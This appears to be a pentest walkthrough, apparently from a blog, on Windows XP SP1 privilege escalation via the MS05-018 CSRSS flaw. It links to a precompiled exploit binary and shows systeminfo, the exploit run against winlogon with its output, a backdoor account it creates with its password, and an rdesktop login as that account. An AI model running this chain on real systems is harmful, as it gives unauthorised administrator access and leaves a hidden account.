Windows XP SP1 Privilege Escalation

MS05-018

MS05-018 Works for Windows 2K SP3/4 | Windows XP SP1/2 Download ms05-018.exe: https://github.com/xiaoxiaoleo/windows_pentest_tools/tree/master/%E6%8F%90%E6%9D%83%E5%B7%A5%E5%85%B7/windows%E6%8F%90%E6%9D%83%E5%B7%A5%E5%85%B7/MS05018%E2%80%94CSRSS.EXE%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/MS05018%E2%80%94CSRSS.EXE%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/tool

C:\WINDOWS\system32&>systeminfo
systeminfo

Host Name:                 VULNBOX
OS Name:                   Microsoft Windows XP Professional
OS Version:                5.1.2600 Service Pack 1 Build 2600
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 6 Model 12 Stepping 2 GenuineIntel ~3457 Mhz
BIOS Version:              INTEL  - 6040000
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\System32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT) Greenwich Mean Time : Dublin, Edinburgh, Lisbon, London
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: File 1
                           [02]: Q147222
                           [03]: KB893803v2 - Update

C:\Inetpub\wwwroot&>MS05-018.exe
ms5.exe
MS05-018 windows CSRSS.EXE Stack Overflow exp v1.0
Affect: Windows 2000 sp3/sp4 (all language)
Coded by eyas <eyas at xfocus.org&> ---&>http://www.xfocus.net
compile by Iceskysl [IST] ---&>www.iceskysl.net

Usage: ms5.exe pid

[+] PID=440 Process=winlogon.exe

C:\Inetpub\wwwroot&>MS05-018.exe 440
ms5.exe 440
MS05-018 windows CSRSS.EXE Stack Overflow exp v1.0
Affect: Windows 2000 sp3/sp4 (all language)
Coded by eyas <eyas at xfocus.org&> ---&>http://www.xfocus.net
compile by Iceskysl [IST] ---&>www.iceskysl.net

[+] FreeConsole ok.
[+] AllocConsole ok.
[+] Get Console Title OK:"ms5.exe 440"
[+] bingo! found hwnd=70038
[+] start search "FF E4" in ntdll.dll
[+] found "FF E4"(jmp esp) in 77FB59CC[ntdll.dll]
[+] CreateFileMapping OK!
[+] MapViewOfFile OK!
[+] Send Exploit!
[+] Done.

It's will successful  add user :
username=e
password=asd#321

root@kali:~# rdesktop -u e -p asd#321  x.x.x.x

Similar Posts: